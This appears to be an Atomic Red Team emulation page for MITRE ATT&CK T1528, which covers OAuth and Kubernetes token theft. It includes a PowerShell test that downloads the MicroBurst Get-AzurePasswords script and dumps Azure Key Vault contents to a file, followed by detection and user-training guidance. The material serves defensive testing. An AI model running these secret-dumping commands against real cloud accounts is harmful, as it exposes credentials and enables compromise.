# T1528 - Steal Application Access Token
Adversaries can steal application access tokens as a means of acquiring credentials to access remote systems and resources.

Application access tokens are used to make authorized API requests on behalf of a user or service and are commonly used as a way to access resources in cloud and container-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework that issues tokens to users for access to systems. Adversaries who steal account API tokens in cloud and containerized environments may be able to access data and perform actions with the permissions of these accounts, which can lead to privilege escalation and further compromise of the environment.

In Kubernetes environments, processes running inside a container communicate with the Kubernetes API server using service account tokens. If a container is compromised, an attacker may be able to steal the container’s token and thereby gain access to Kubernetes API commands.(Citation: Kubernetes Service Accounts)

Token theft can also occur through social engineering, in which case user action may be required to grant access. An application desiring access to cloud-based services or protected APIs can gain entry using OAuth 2.0 through a variety of authorization protocols. An example commonly-used sequence is Microsoft's Authorization Code Grant flow.(Citation: Microsoft Identity Platform Protocols May 2019)(Citation: Microsoft - OAuth Code Authorization flow - June 2019) An OAuth access token enables a third-party application to interact with resources containing user data in the ways requested by the application without obtaining user credentials. 
 
Adversaries can leverage OAuth authorization by constructing a malicious application designed to be granted access to resources with the target user's OAuth token.(Citation: Amnesty OAuth Phishing Attacks, August 2019)(Citation: Trend Micro Pawn Storm OAuth 2017) The adversary will need to complete registration of their application with the authorization server, for example Microsoft Identity Platform using Azure Portal, the Visual Studio IDE, the command-line interface, PowerShell, or REST API calls.(Citation: Microsoft - Azure AD App Registration - May 2019) Then, they can send a [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) to the target user to entice them to grant access to the application. Once the OAuth access token is granted, the application can gain potentially long-term access to features of the user account through [Application Access Token](https://attack.mitre.org/techniques/T1550/001).(Citation: Microsoft - Azure AD Identity Tokens - Aug 2019)

Application access tokens may function within a limited lifetime, limiting how long an adversary can utilize the stolen token. However, in some cases, adversaries can also steal application refresh tokens(Citation: Auth0 Understanding Refresh Tokens), allowing them to obtain new access tokens without prompting the user.  



## Atomic Tests

### Atomic Test #1 - Azure - Dump All Azure Key Vaults with Microburst
Upon successful execution of this test, the names, locations, and contents of key vaults within an Azure account will be output to a file.
See - https://www.netspi.com/blog/technical/cloud-penetration-testing/a-beginners-guide-to-gathering-azure-passwords/
**Supported Platforms:** iaas:azure
Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: The Get-AzurePasswords script must exist in $env:temp.

##### Check Prereq Commands:
```powershell
if (test-path $env:temp\Get-AzurePasswords.ps1){exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
invoke-webrequest "https://raw.githubusercontent.com/NetSPI/MicroBurst/c771c665a2c71f9c5ba474869cd1c211ebee68fd/AzureRM/Get-AzurePasswords.ps1" -outfile "$env:temp\Get-AzurePasswords.ps1"

```
##### Description: The Azure RM module must be installed.

##### Check Prereq Commands:
```powershell
try {if (Get-InstalledModule -Name AzureRM -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}

```
##### Get Prereq Commands:
```powershell
Install-Module -Name AzureRM -Force -allowclobber

```
##### Description: The Azure module must be installed.

##### Check Prereq Commands:
```powershell
try {if (Get-InstalledModule -Name Azure -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}

```
##### Get Prereq Commands:
```powershell
Install-Module -Name Azure -Force -allowclobber

```

In [ ]:
Invoke-AtomicTest T1528 -TestNumbers 1 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
import-module "$env:temp\Get-AzurePasswords.ps1"
$Password = ConvertTo-SecureString -String "T1082Az" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "None", $Password
Connect-AzureRmAccount -Credential $Credential
Get-AzurePasswords -subscription 'None' > $env:temp\T1528Test1.txt
cat $env:temp\T1528Test1.txt
```

In [ ]:
Invoke-AtomicTest T1528 -TestNumbers 1

## Detection
Administrators should set up monitoring to trigger automatic alerts when policy criteria are met. For example, using a Cloud Access Security Broker (CASB), admins can create a “High severity app permissions” policy that generates alerts if apps request high severity permissions or send permissions requests for too many users.

Security analysts can hunt for malicious apps using the tools available in their CASB, identity provider, or resource provider (depending on platform.) For example, they can filter for apps that are authorized by a small number of users, apps requesting high risk permissions, permissions incongruous with the app’s purpose, or apps with old “Last authorized” fields. A specific app can be investigated using an activity log displaying activities the app has performed, although some activities may be mis-logged as being performed by the user. App stores can be useful resources to further investigate suspicious apps.

Administrators can set up a variety of logs and leverage audit tools to monitor actions that can be conducted as a result of OAuth 2.0 access. For instance, audit reports enable admins to identify privilege escalation actions such as role creations or policy modifications, which could be actions performed after initial access.

## Shield Active Defense
### User Training 
 Train users to detect malicious intent or activity, how to report it, etc. 

 User training involves teaching end users to be human sensors who know how to recognize cyber threats and the procedures for reporting them.  Users can be effective sensors for social engineering attempts, phishing email detection, as well as other cyber threats.
#### Opportunity
Users trained and encouraged to report unsolicited application authorization requests can detect attacks that other defenses do not.
#### Use Case
A program to train users on how to recognize and report third-party applications requesting authorization can create "Human Sensors" that help detect application token theft.
#### Procedures
Train users to immediately report suspicious emails.  Those emails could then be used for malware detonation or adversary engagement purposes.
Train users to report potentially compromised devices so they can be isolated or migrated into deception networks.